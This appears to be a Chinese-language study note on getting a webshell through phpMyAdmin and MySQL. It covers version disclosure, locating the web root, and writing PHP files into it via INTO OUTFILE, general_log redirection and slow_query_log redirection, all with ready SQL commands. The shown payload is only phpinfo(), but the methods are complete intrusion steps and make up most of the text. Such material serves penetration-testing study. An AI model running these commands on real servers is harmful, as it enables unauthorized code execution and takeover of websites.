前言

phpMyadmin写shell,之前只是大概了解一些，学习一下。

信息收集

在写shell前，需要先知道网站的真实路径，如果不知道网站真实路径则无法通过URL的方式连shell，所以就要先收集信息
版本信息获取

readme.php
README
changelog.php
Change
Documetation.html
Documetation.txt
translators.html

在phpmyadmin路径后添加以上文件，若管理员没有删除则可以查看到相应的版本信息。

获取绝对路径

1. phpinfo()页面
2. 如果站点是集成的Web框架，可以通过查看数据库路径来猜测Web路径

   show variables like '%datadir%';
   select @@datadir

   
   如果确定了前两层目录为/var/www/,但最后一层目录不能确定，可以采用目标域名+常用的网站根目录的方式进行爆破

   select 'test' into outfile '/var/www/$fuzz$/shell.php'；

   如果fuzz的目录存在但没有写进去则显示

   Errcode: 13

如果不存在该目录则会显示

Can’t create/write to file ‘/var/www/html/shell.php (Errcode: 2)；

Getshell姿势

0x00:写入文件getshell

使用into outfile 直接在网站目录下写入webshell

前提条件：

1. 数据库用户有写权限
2. 知道了web目录的绝对路径
3. web路径可以写

判断当前数据库用户是否具有写权限

show variables like '%secure%';

这里需要了解一下secure_file_priv参数的特性及作用：

• 当secure_file_priv的值为null ，表示限制mysql 不允许导入|导出
• 当secure_file_priv的值为/tmp/ ，表示限制mysql 的导入|导出只能发生在/tmp/目录下
• 当secure_file_priv的值没有具体值时，表示不对mysql 的导入|导出做限制

直接写shell文件

select "<?php phpinfo();?>" INTO OUTFILE "C:\\phpstudy\\www\\phpinfo.php"

注意要双反斜线，否则会转义

0x01:日志文件写入webshell

前提条件

1. 有读写权限
2. 知道了web绝对路径

利用方法：

开启日志记录
set global general_log = "ON";
查看当前的日志目录
show variables like 'general%';
指定日志文件
set global general_log_file = "C:/phpStudy/WWW/shell.php";
写入执行代码
select "<?php phpinfo();?>";

0x02:慢查询写入webshell

查看当前慢查询日志目录
show variables like '%slow%';
重新设置路径
set GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';
开启慢查询日志
set GLOBAL slow_query_log=on;
执行写入日志
select '<?php phpinfo();?>' from mysql.db where sleep(10);

参考博客

https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label1_2